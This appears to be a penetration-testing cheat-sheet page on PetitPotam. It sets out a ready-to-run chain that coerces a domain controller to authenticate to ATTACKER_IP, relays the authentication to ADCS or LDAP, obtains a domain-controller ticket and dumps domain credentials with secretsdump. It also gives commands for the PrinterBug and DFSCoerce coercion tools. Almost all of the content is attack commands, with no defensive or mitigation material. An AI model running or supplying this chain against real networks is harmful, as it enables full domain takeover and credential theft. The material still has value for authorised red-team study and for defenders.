> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# PetitPotam

> PetitPotam: coerce DC authentication via MS-EFSRPC and relay to ADCS or LDAP for domain compromise.

## Overview

Abuse MS-EFSRPC to coerce target (typically DC) to authenticate to attacker. Relay authentication to ADCS (ESC8) or LDAP for domain takeover.

***

## Coerce Authentication

```bash theme={"dark"}
# https://github.com/topotam/PetitPotam
python3 PetitPotam.py ATTACKER_IP DC_IP
python3 PetitPotam.py ATTACKER_IP DC_IP -u user -p password -d DOMAIN
```

### Unauthenticated (Unpatched)

```bash theme={"dark"}
python3 PetitPotam.py ATTACKER_IP DC_IP
```

### Authenticated

```bash theme={"dark"}
python3 PetitPotam.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP
```

***

## Relay to ADCS (ESC8) — Full Domain Takeover

### Setup ntlmrelayx

```bash theme={"dark"}
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

### Trigger PetitPotam

```bash theme={"dark"}
python3 PetitPotam.py ATTACKER_IP DC_IP
```

### Use Certificate

```bash theme={"dark"}
# Get TGT with certificate
python3 gettgtpkinit.py DOMAIN/'DC$' dc.ccache -cert-pfx dc.pfx

# DCSync
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass DOMAIN/'DC$'@DC_HOSTNAME
```

***

## Relay to LDAP (RBCD)

```bash theme={"dark"}
impacket-ntlmrelayx -t ldap://DC_IP --delegate-access --escalate-user attacker
```

```bash theme={"dark"}
python3 PetitPotam.py ATTACKER_IP DC_IP
```

***

## Other Coercion Methods

| Tool                     | Protocol  |
| ------------------------ | --------- |
| PetitPotam               | MS-EFSRPC |
| PrinterBug / SpoolSample | MS-RPRN   |
| DFSCoerce                | MS-DFSNM  |
| ShadowCoerce             | MS-FSRVP  |

### PrinterBug

```bash theme={"dark"}
# https://github.com/dirkjanm/krbrelayx
python3 printerbug.py DOMAIN/user:password@DC_IP ATTACKER_IP
```

### DFSCoerce

```bash theme={"dark"}
python3 dfscoerce.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP
```

***

## Quick Reference

| Step       | Command                                                   |
| ---------- | --------------------------------------------------------- |
| Coerce     | `PetitPotam.py ATTACKER DC_IP`                            |
| Relay ADCS | `ntlmrelayx -t http://CA/certsrv/... --adcs`              |
| Relay LDAP | `ntlmrelayx -t ldap://DC --delegate-access`               |
| Get TGT    | `gettgtpkinit.py DOMAIN/'DC$' dc.ccache -cert-pfx dc.pfx` |
